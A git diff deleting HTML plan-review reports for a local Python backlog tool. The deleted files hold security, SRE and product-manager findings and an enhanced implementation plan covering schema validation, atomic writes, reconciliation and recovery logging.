-<td>Reversibility &amp; exit cost</td>
-<td>Warning</td>
-<td>A</td>
-<td>TRD §14 graded exit ramp (kill switch → revert/replay → PR back-out) tied to observable triggers.</td>
-</tr>
-<tr>
-<td>PM10</td>
-<td>Business value alignment</td>
-<td>Critical</td>
-<td>B</td>
-<td>Tied to real operational pain + measurable outcome, but the <strong>load-bearing value premise is explicitly unvalidated (no baseline)</strong> and links to internal-workflow pain, not a named OKR.</td>
-</tr>
-</tbody>
-</table>
-<h2 id="consolidated-pm-recommendations-p2">Consolidated PM recommendations (P2)</h2>
-<ul>
-<li><strong>PM4:</strong> add a coarse effort estimate (t-shirt/points) + one-line impact per milestone so M1→M2→M3 is justified by impact-per-effort, not dependency chains alone.</li>
-<li><strong>PM5:</strong> add a 3–4 sentence stakeholder/executive summary near the top of the PRD (or promote the TRD one-liner) stating what + business-why in plain language before the jargon.</li>
-<li><strong>PM6:</strong> add 1–2 sentences making the buy-vs-build case explicit — why the ClickUp/Jira backlog can't serve as the pre-pipeline staging area (not co-located with manifest.json/plan.json, no reconciliation against Shield artifacts, would pollute the PM board of record).</li>
-<li><strong>PM10:</strong> state the operational cost the tool recovers in concrete terms (ideas lost/re-derived per week, or maintainer re-scoping time) so the &quot;justifies the tool&quot; bet has a falsifiable target the 30-day v1 audit can measure against.</li>
-</ul>
-<p>No P0/P1 from the PM persona — all four sub-B dims are Important/Warning-severity B grades (→ P2).</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html
deleted file mode 100644
index da925030..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html
+++ /dev/null
@@ -1,170 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="security-engineer--detailed-findings">Security Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: A−.</strong> Security-mature for its surface (single-actor local tool over a plaintext git-tracked store of developer idea text — no PII/auth/network). Threat model is honest, trust boundaries are clean, and security claims are pinned to executable, falsifiable ACs. The four folded prior-review findings are all present, correctly threat-framed, and sufficient. Lands A− (not A) because the recovery layer (N4) and single-writer claim (N5) rest on ordering/assumption guarantees not yet pinned to tests.</p>
-<h2 id="folded-finding-verification">Folded-finding verification</h2>
-<table>
-<thead>
-<tr>
-<th>Folded finding</th>
-<th>Sufficient?</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Malformed/partial read refused with <code>BacklogInvalid</code> (F5)</td>
-<td>Yes — &quot;single integrity primitive&quot; (TRD §9), concrete AC</td>
-</tr>
-<tr>
-<td>Concurrency eval: no corruption AND no lost entry</td>
-<td>Yes — correctly distinguishes lost-entry (RMW race) from corruption (crash mid-write)</td>
-</tr>
-<tr>
-<td>No-stamping eval (F6): plan.json byte-unchanged</td>
-<td>Yes — byte-unchanged is the right assertion</td>
-</tr>
-<tr>
-<td>Epic-name collision across features → ambiguous → stays</td>
-<td>Yes — fixture exists (ambiguous-match-stays)</td>
-</tr>
-</tbody>
-</table>
-<h2 id="evaluation-points-af">Evaluation points (A–F)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Point</th>
-<th>Grade</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>SE1</td>
-<td>Threat model coverage</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>SE2</td>
-<td>Least-privilege design</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE3</td>
-<td>Data protection</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE4</td>
-<td>Secrets management</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE5</td>
-<td>Network security</td>
-<td>N/A</td>
-</tr>
-<tr>
-<td>SE6</td>
-<td>Access control</td>
-<td>N/A</td>
-</tr>
-<tr>
-<td>SE7</td>
-<td>Compliance</td>
-<td>N/A</td>
-</tr>
-<tr>
-<td>SE8</td>
-<td>Incident response</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>SE9</td>
-<td>Acceptance criteria quality</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE10</td>
-<td>Edge case &amp; rollback coverage</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>SE11</td>
-<td>Integration test strategy</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE12</td>
-<td>Regression risk</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE13</td>
-<td>Environment validation</td>
-<td>B+</td>
-</tr>
-<tr>
-<td>SE14</td>
-<td>Security validation</td>
-<td>A−</td>
-</tr>
-</tbody>
-</table>
-<h2 id="findings">Findings</h2>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>SE10/SE1 (P1-a)</td>
-<td>No detection for a violated single-writer assumption (N5). If violated, the outcome is a silent lost update. Add a cheap compare-before-replace: <code>capture()</code>/<code>remove()</code> carry the schema_version+entry-count (or mtime/hash) read at start and refuse <code>os.replace()</code> if the on-disk file changed underneath — converts a silent lost-update into a loud <code>BacklogInvalid</code> refusal <strong>without a lockfile</strong>. (Also resolves backend P1-1.)</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>SE14/SE9 (P1-b)</td>
-<td>Write-side validation is asserted (&quot;validate-or-refuse on read/write&quot;) but only read-side + crash-mid-write are tested. Add AC+eval: &quot;<code>capture()</code> that would produce a schema-invalid document raises <code>BacklogInvalid</code> and leaves backlog.json byte-unchanged (no .tmp promoted).&quot;</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>SE10/SE14 (P1-c)</td>
-<td>The recovery-sink ordering (append-before-remove) is stated in prose but not pinned to a test. Strengthen the recovery-rehearsal eval to assert recoverability across a simulated crash at the ordering seam (after append/before remove; after remove/before commit).</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE1/SE8 (P2-a)</td>
-<td><code>.shield/backlog-removed.log</code> is a new write surface with no integrity story (no schema, no validate-or-refuse, git-tracked status unspecified). Specify tracked/ignored + read it back through a defined parser in the recovery eval.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE13 (P2-b)</td>
-<td>Dry-run isolation is a doc task, not a guarded invariant; the lazy sweep runs on every view. Make dry-run/fixture mode provably non-destructive (force kill switch off, or disable sweep when a fixture path is supplied) + add to the eval matrix.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE1 (P2-c)</td>
-<td>Migration is doc-only (correct for v1); add a forward note that any future <code>migrate()</code> must itself be validate-or-refuse (a half-migrated write is the next corruption vector).</td>
-</tr>
-</tbody>
-</table>
-<p>No P0 findings from security.</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html
deleted file mode 100644
index f342c0aa..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html
+++ /dev/null
@@ -1,145 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="sre--operations--detailed-findings">SRE / Operations — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: A−.</strong> Operationally mature: all four prior SRE findings landed with verbatim fidelity; failure-mode analysis is genuinely strong (safe-failure direction is explicit and testable). Remaining risk is concentrated in the N4 recovery path.</p>
-<h2 id="prior-finding-verification">Prior-finding verification</h2>
-<table>
-<thead>
-<tr>
-<th>Finding</th>
-<th>Landed?</th>
-<th>Sufficient?</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>OP1 — log every removal with rationale <code>{entry id, feature, epic, match-kind, triggering run, gating plan.json path}</code></td>
-<td>Yes (TRD §5 F9, EPIC-3-S2, lld-reconciler §10)</td>
-<td>Yes — elevated to single integrity surface (TRD §9)</td>
-</tr>
-<tr>
-<td>OP7 — kill switch</td>
-<td>Yes (TRD §5 F10, §14, EPIC-3-S3, lld-reconciler §9)</td>
-<td>Mostly — see P2-1: a single boolean disables <strong>both</strong>; &quot;independently&quot; is not actually delivered</td>
-</tr>
-<tr>
-<td>OP4 — uncommitted-state recovery gap</td>
-<td>Yes (TRD §6 N4, §9, §14, EPIC-3-S3, lld-reconciler §8)</td>
-<td>Yes for eager path; see P1-1 — the OR is unresolved</td>
-</tr>
-<tr>
-<td>OP2/OP5 — N2 latency instrumented</td>
-<td>Yes (TRD §6 N2, EPIC-3-S3, lld-reconciler §10/§12.4)</td>
-<td>Yes — wired to a §14 rollback trigger</td>
-</tr>
-</tbody>
-</table>
-<h2 id="evaluation-points-af">Evaluation points (A–F)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Point</th>
-<th>Grade</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>OP1</td>
-<td>Observability plan</td>
-<td>A</td>
-</tr>
-<tr>
-<td>OP2</td>
-<td>Monitoring &amp; alerting</td>
-<td>B</td>
-</tr>
-<tr>
-<td>OP3</td>
-<td>Failure mode analysis</td>
-<td>A</td>
-</tr>
-<tr>
-<td>OP4</td>
-<td>Backup &amp; recovery</td>
-<td>B+</td>
-</tr>
-<tr>
-<td>OP5</td>
-<td>Capacity planning</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>OP6</td>
-<td>Change management</td>
-<td>A</td>
-</tr>
-<tr>
-<td>OP7</td>
-<td>On-call readiness</td>
-<td>B+</td>
-</tr>
-</tbody>
-</table>
-<h2 id="findings">Findings</h2>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>OP4 (P1-1)</td>
-<td>N4 recovery mechanism is an unresolved OR with divergent semantics (commit-before-prune → <code>git revert</code>, vs removed-log → replay). The §14 runbook can't be written precisely. Pick one v1 default — recommend removed-log (avoids forcing a possibly-dirty-tree commit on every prune; decouples recovery from git state, which matters mid-<code>/implement</code>). Make the other an explicit non-goal; update EPIC-3-S3 AC + §14 step 2.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP7 (P2-1)</td>
-<td>Kill switch doesn't disable triggers &quot;independently&quot; — one coupled boolean. Drop the &quot;independently&quot; framing (coupled is the right v1 scope) or split into <code>auto_reconcile.eager</code>/<code>.lazy</code>.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP2 (P2-2)</td>
-<td>Wrong-removal detection is pull-only (operator must read the log). Have <code>/backlog view</code> surface &quot;N entries removed since last view (see backlog-removed.log)&quot; when the log grows.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP4 (P2-3)</td>
-<td>Removed-log lifecycle undefined (git-tracked vs gitignored, rotation, max size). Specify — and the tracked/ignored choice ties to P1-1.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP7 (P2-4)</td>
-<td>EPIC-4-S2 AC lists feature docs for SKILL.md but not the recovery procedure. Add: SKILL.md documents wrong-removal recovery (flip kill switch → locate F9 log line → revert/replay).</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP7 (P2-5)</td>
-<td>Audit interval still &quot;e.g. monthly&quot; — commit to an actual interval.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP1 (P2-6)</td>
-<td>Specify no-op eager prune logging (if lazy sweep beat it): &quot;no-op prune emits no log line&quot; to avoid duplicate recovery records.</td>
-</tr>
-</tbody>
-</table>
-<p>No P0 findings.</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html
deleted file mode 100644
index 1983554a..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html
+++ /dev/null
@@ -1,207 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<!-- sidecar: ../../../plan.json -->
-<!-- enhanced by /plan-review on 2026-05-29 — P0/P1 fixes folded into affected stories -->
-<h1 id="plan--shield-backlog-enhanced-2026-05-29">Plan — Shield Backlog (enhanced 2026-05-29)</h1>
-<p><strong>Project:</strong> Shield · <strong>Phase:</strong> v1 · <strong>Domain:</strong> backend (Python)
-<strong>PRD:</strong> <a href="../../../prd.md"><code>prd.md</code></a> (PRD-review <strong>Ready</strong>, composite 3.12) · <strong>TRD:</strong> <a href="../../../trd.md"><code>trd.md</code></a> · <strong>Sidecar:</strong> <a href="../../../plan.json"><code>plan.json</code></a>
-<strong>Plan-review:</strong> Ready, composite 3.49 (B+) — conditional on the 3 P0 fixes below.</p>
-<blockquote>
-<p><strong>Changes applied in this enhanced version</strong> (review 2026-05-29):</p>
-<ul>
-<li><strong>P0-1 / P0-2 / P0-3</strong> folded into EPIC-3-S2, EPIC-3-S3, EPIC-1-S1, and a new schema task.</li>
-<li><strong>P1s</strong> (recovery-OR resolution, lost-update detection, dup-id wording, name==slug, packaging, CI entrypoint, write-side + ordering-seam evals) folded into the affected stories.</li>
-<li>P2s recorded as inline <code>[P2]</code> notes for the implementer to pick up opportunistically.</li>
-</ul>
-</blockquote>
-<h2 id="milestones">Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Depends on</th>
-<th>Touches LLD</th>
-<th>Outcome</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>—</td>
-<td><code>backlog-store</code></td>
-<td><code>backlog.json</code> + schema/validator; capture (user + skill, atomic, validate-or-refuse, lost-update detection); <code>/backlog</code> ordered view with manifest status badges; manual remove.</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>M1</td>
-<td><code>epic-suggester</code></td>
-<td>Every entry carries feature + epic; agent suggests via exact-normalized match against the pinned manifest/plan shapes; user accept/replace/create-new.</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>M2</td>
-<td><code>reconciler</code></td>
-<td>Promotion via transient reference; reconciliation engine (single &quot;epic landed&quot; predicate matching existing epics by <strong>name</strong>, never-remove-on-doubt, drift tolerance, removal logging); eager + lazy idempotent triggers + kill switch (incl. <code>.shield.json</code> schema change); eval suite + version bump.</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="epic-1--store-schema--capture--m1">EPIC-1 — Store, schema &amp; capture  <em>(M1)</em></h2>
-<h3 id="epic-1-s1--define-backlogjson-schema-and-validator-high">EPIC-1-S1 · Define backlog.json schema and validator <em>(high)</em></h3>
-<p>Define <code>backlog.json</code> shape + JSON Schema with a top-level <code>schema_version</code>, plus a Python validator. Entry: <code>{id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}</code>.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/schema/backlog.schema.json</code>; <code>id</code> = <code>uuid4</code> string; document entry shape + migration policy (doc-only until <code>schema_version</code> 2) in <code>shield/skills/general/backlog/SKILL.md</code>; create <code>shield/scripts/validate_backlog.py</code>; ordering = single integer <code>order</code>.
-<ul>
-<li><strong>[P1-2 — fix]</strong> Uniqueness of <code>id</code> across <code>entries[]</code> is enforced by <strong><code>validate_backlog.py</code></strong> (named error <code>duplicate_entry_id</code>), <strong>not</strong> by the JSON Schema — draft 2020-12 <code>uniqueItems</code> is whole-item equality and cannot express property-level uniqueness. Reword F2 + the AC accordingly.</li>
-<li><strong>[P1-3 — fix]</strong> Document the invariant <strong><code>manifest features[].name</code> == feature folder slug</strong> (the reconciliation key) in the SKILL.md, since suggestion + reconciliation both rely on it.</li>
-<li><strong>[P2]</strong> State runtime prereqs once (Python ≥3.x via uv; validator uses pydantic + jsonschema).</li>
-</ul>
-</li>
-<li><strong>AC:</strong> schema rejects unknown <code>kind</code>/<code>source</code> (named error); <strong>the validator</strong> rejects duplicate <code>id</code> (<code>duplicate_entry_id</code>); <code>validate_backlog.py</code> exits 0/non-zero correctly; <code>schema_version</code> + migration policy present; <code>id</code> is a <code>uuid4</code> string.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#apis-involved">TRD §11 APIs Involved</a> · LLD <a href="../../../lld-backlog-store.md#data-model"><code>backlog-store</code> §4 Data model</a></li>
-</ul>
-<h3 id="epic-1-s2--capture-entrypoint-user--skill-with-atomic-write--lost-update-detection-high">EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write + lost-update detection <em>(high)</em></h3>
-<p>Capture usable by the user (<code>/backlog add</code>) and any skill (documented <code>capture()</code> helper). Atomic temp-then-rename + validate-or-refuse.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>/backlog add</code> (assigns next <code>order</code> + <code>uuid4</code> id); <strong>LOCKED</strong> signature <code>capture(text, *, kind=&quot;task&quot;, feature=None, epic=None, source) -&gt; str</code> in <code>shield/scripts/backlog_store.py</code>, raising <code>BacklogInvalid</code>; <strong>LOCKED</strong> single-writer (no lock) → full doc → <code>.tmp</code> → <code>os.replace()</code>.
-<ul>
-<li><strong>[P1-1 — fix]</strong> Add <strong>compare-before-replace</strong>: <code>capture()</code>/<code>remove()</code> capture the on-disk <code>schema_version</code>+entry-count (or mtime/hash) at read time and refuse the <code>os.replace()</code> if the file changed underneath, raising <code>BacklogInvalid</code>. Converts a silent lost-update (the real N1/N5 threat) into a loud refusal <strong>without a lockfile</strong>.</li>
-<li><strong>[P1-4 — fix]</strong> Package <code>backlog_store</code> as an importable module with a <code>pyproject.toml</code> (F3 requires skills to import <code>capture()</code>); document the import path. Makes the EPIC-4-S2 version bump unconditional.</li>
-<li><strong>[P2]</strong> <code>os.fsync()</code> the temp fd before <code>os.replace()</code>; use a unique <code>.tmp</code> suffix (pid/uuid). Consider <code>read() -&gt; BacklogDoc</code> (pydantic) over raw dict.</li>
-</ul>
-</li>
-<li><strong>AC:</strong> user + skill capture both work; interface documented + pinned in TRD §11; mid-write kill leaves no corruption; <strong>a concurrent on-disk change between read and replace is refused with <code>BacklogInvalid</code> (no lost entry)</strong>; malformed/partial read refused with <code>BacklogInvalid</code>.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#functional-requirements">TRD §5 Functional Requirements</a> · LLD <a href="../../../lld-backlog-store.md#api-contracts"><code>backlog-store</code> §5 API contracts</a></li>
-</ul>
-<h3 id="epic-1-s3--backlog-view--ordered-list-high">EPIC-1-S3 · /backlog view — ordered list <em>(high)</em></h3>
-<p><code>/backlog</code> command + skill rendering entries sorted by <code>order</code> with feature + epic + source.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/commands/backlog.md</code> + <code>backlog/SKILL.md</code>; render sorted; define render-line format once; document a <strong>provably non-destructive</strong> local-dev/dry-run loop; empty-backlog message.
-<ul>
-<li><strong>[P2 — security]</strong> Dry-run/fixture mode MUST force the lazy sweep off (the sweep runs on every real view) so testing a fixture can't mutate the project store.</li>
-</ul>
-</li>
-<li><strong>AC:</strong> ascending-<code>order</code> list with feature/epic/source; clean empty message; command registered; dry-run mode runs no sweep against the project store.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#product-journey">TRD §4 Product Journey</a></li>
-</ul>
-<h3 id="epic-1-s4--manual-remove-from-backlog-medium">EPIC-1-S4 · Manual remove from /backlog <em>(medium)</em></h3>
-<p><code>/backlog remove &lt;id&gt;</code> — plain delete.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>remove &lt;id&gt;</code> via atomic helper; confirm-before-delete; clear error on absent id; document the recoverability boundary (uncommitted manual remove is unrecoverable by design — N4).</li>
-<li><strong>AC:</strong> deletes + persists atomically; absent id = clear no-op error; no history retained.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#functional-requirements">TRD §5 Functional Requirements</a> · LLD <a href="../../../lld-backlog-store.md#api-contracts"><code>backlog-store</code> §5 API contracts</a></li>
-</ul>
-<hr />
-<h2 id="epic-2--association--pipeline-status--epic-2-deliberately-straddles-m1m2--see-note">EPIC-2 — Association &amp; pipeline status  <em>(EPIC-2 deliberately straddles M1/M2 — see note)</em></h2>
-<blockquote>
-<p><strong>[P2 — agile]</strong> EPIC-2-S1 (status badges) ships with the M1 view; EPIC-2-S2 (association + suggestion) is the M2 deliverable. This straddle is intentional, not a numbering slip.</p>
-</blockquote>
-<h3 id="epic-2-s1--per-entry-pipeline-status-from-manifestjson-high-m1">EPIC-2-S1 · Per-entry pipeline status from manifest.json <em>(high, M1)</em></h3>
-<ul>
-<li><strong>Tasks:</strong> read manifest; render status badges; pin badge string <code>research ✓  prd ✓  plan –</code>; <code>not started</code> when feature absent; compute at view time.
-<ul>
-<li><strong>[P0-1 — fix]</strong> Read against the <strong>pinned manifest contract</strong> (see TRD §11 addition): <code>manifest.json</code> = <code>{schema_version, features:[{name, artifacts:{research,prd,plan_json,...}}]}</code> — a list keyed by <code>name</code>, <code>plan_json</code> is a boolean flag, <strong>no plan path stored</strong>.</li>
-</ul>
-</li>
-<li><strong>AC:</strong> badges derived from the pinned manifest shape; prd-but-no-plan shows <code>prd ✓ plan –</code> and stays; absent feature → <code>not started</code>.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#high-level-design">TRD §7 High-Level Design</a></li>
-</ul>
-<h3 id="epic-2-s2--feature--epic-association--agent-suggestion-high-m2">EPIC-2-S2 · Feature + epic association + agent suggestion <em>(high, M2)</em></h3>
-<ul>
-<li><strong>Tasks:</strong> prompt/accept feature + epic (allow proposed-new); <strong>LOCKED</strong> exact-normalized match (<code>casefold()</code> + collapsed ws); suggest by scanning manifest + candidate plan.json; never block capture; tie → surface all, auto-pick none.
-<ul>
-<li><strong>[P0-1 — fix]</strong> <code>suggest_feature(text, *, manifest)</code> and <code>suggest_epic(text, *, feature, plans)</code> are typed against the real shapes: <code>manifest.features[].name</code>; <code>plans</code> is <code>dict[feature-slug → parsed plan.json]</code>, the path derived as <code>docs/shield/&lt;slug&gt;/plan.json</code> for features with <code>artifacts.plan_json == true</code>.</li>
-<li><strong>[P1-3 — fix]</strong> <code>suggest_feature</code> returns <code>features[].name</code>, which <strong>is</strong> the folder slug (invariant pinned in EPIC-1-S1).</li>
-</ul>
-</li>
-<li><strong>AC:</strong> every entry has feature + epic; ≥1 feature + ≥1 epic candidate when matches exist; <code>auth</code> fixture surfaces <code>auth</code> top candidate + 2-way tie auto-picks neither; <strong>a suggested feature value resolves to an existing <code>docs/shield/&lt;value&gt;/</code> path</strong>; capture succeeds proposed-new when none.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#functional-requirements">TRD §5 Functional Requirements</a> · LLD <a href="../../../lld-epic-suggester.md#api-contracts"><code>epic-suggester</code> §5 API contracts</a></li>
-</ul>
-<hr />
-<h2 id="epic-3--promotion--reconciliation--m3">EPIC-3 — Promotion &amp; reconciliation  <em>(M3)</em></h2>
-<h3 id="epic-3-s1--user-driven-promotion-with-transient-reference-high">EPIC-3-S1 · User-driven promotion with transient reference <em>(high)</em></h3>
-<p><code>/backlog promote &lt;id&gt;</code> launches the user-chosen step and passes the entry id as a transient runtime reference — never stamped into <code>plan.json</code> (F6).</p>
-<ul>
-<li><strong>AC:</strong> promotion starts the chosen step + forwards the reference; reference not persisted (F6); tool never auto-routes.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#product-journey">TRD §4 Product Journey</a></li>
-</ul>
-<blockquote>
-<p><strong>Intra-epic dependency:</strong> EPIC-3-S3 consumes EPIC-3-S1 + EPIC-3-S2 and lands after both.</p>
-</blockquote>
-<h3 id="epic-3-s2--reconciliation-engine-match-key--never-remove-on-doubt-high">EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) <em>(high)</em></h3>
-<p>Locate feature in <code>manifest.json</code>; if it has a <code>plan.json</code>, apply the single <strong>&quot;epic landed&quot; predicate</strong> (F8).</p>
-<ul>
-<li><strong>Tasks:</strong> <code>shield/scripts/reconcile_backlog.py</code>; never-remove-on-doubt; drift tolerance with logged warning; log every removal <code>{entry id, feature, epic, match-kind, triggering run, gating plan.json path}</code>.
-<ul>
-<li><strong>[P0-2 — fix]</strong> Match key: <strong>existing epic by normalized <code>name</code></strong> (NOT by <code>EPIC-N</code> id — ids are positional slots reassigned on every re-<code>/plan</code>, so id-matching breaks across re-plans). Proposed-new also by normalized name. <code>EPIC-N</code> is only a within-one-plan disambiguator. Story status never consulted.</li>
-<li><strong>[P0-1 — fix]</strong> <code>reconcile(entry, *, manifest: dict, plans: dict[str,dict]) -&gt; RemovalDecision</code> — <code>manifest</code> is the parsed <code>{schema_version, features:[...]}</code>; <code>plans</code> maps feature-slug → parsed plan.json (path derived, not stored). Define the <code>RemovalDecision</code> dataclass carrying the F9 log fields <strong>[P2]</strong>.</li>
-</ul>
-</li>
-<li><strong>AC:</strong> removed only when an epic with <strong>normalized-exact name</strong> is present in <code>plan.json.epics[]</code> (story status not consulted); prd-only not removed; epic-name collision across two features → ambiguous → stays; <strong>an epic reordered across a re-plan still resolves correctly</strong>; malformed/old shapes → stays (logged), no exception; every removal emits the structured log line.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#high-level-design">TRD §7 High-Level Design</a> · LLD <a href="../../../lld-reconciler.md#sequence-flows"><code>reconciler</code> §6 Sequence flows</a></li>
-</ul>
-<h3 id="epic-3-s3--eager--lazy-removal-triggers-idempotent--kill-switch-high">EPIC-3-S3 · Eager + lazy removal triggers (idempotent) + kill switch <em>(high)</em></h3>
-<p>Eager prune at end of promoted <code>/plan</code>/<code>/implement</code>; lazy sweep on view. Both idempotent; both call the one engine. Lands after S1 + S2.</p>
-<ul>
-<li><strong>Tasks:</strong> eager prune hook; lazy sweep; idempotent remove-if-present + shared engine; debug-gated latency line.
-<ul>
-<li><strong>[P0-3 — fix]</strong> Extend <code>shield/schemas/shield.schema.json</code> with an optional <code>backlog</code> object (<code>{auto_reconcile: bool, default true}</code>) + a config example — the current schema has <code>additionalProperties: false</code>, so the kill switch fails validation without this. (Reflected in the EPIC-4-S2 version bump.)</li>
-<li><strong>[P1-1 (agile/sre) — fix]</strong> Resolve the N4 recovery OR: <strong>v1 default = <code>.shield/backlog-removed.log</code></strong> (append the entry <em>before</em> the destructive remove); commit-before-prune is an explicit non-goal. Update TRD §6 N4 + §14 step 2 to name the single mechanism.</li>
-<li><strong>[P2 — sre]</strong> Drop &quot;independently&quot; (one coupled boolean); surface &quot;N entries removed since last view (see backlog-removed.log)&quot; on view; define the removed-log lifecycle (gitignored, append-only, manual rotation); specify &quot;no-op prune emits no log line&quot;; state the N2 WARN threshold (&quot;&gt;1s&quot;).</li>
-</ul>
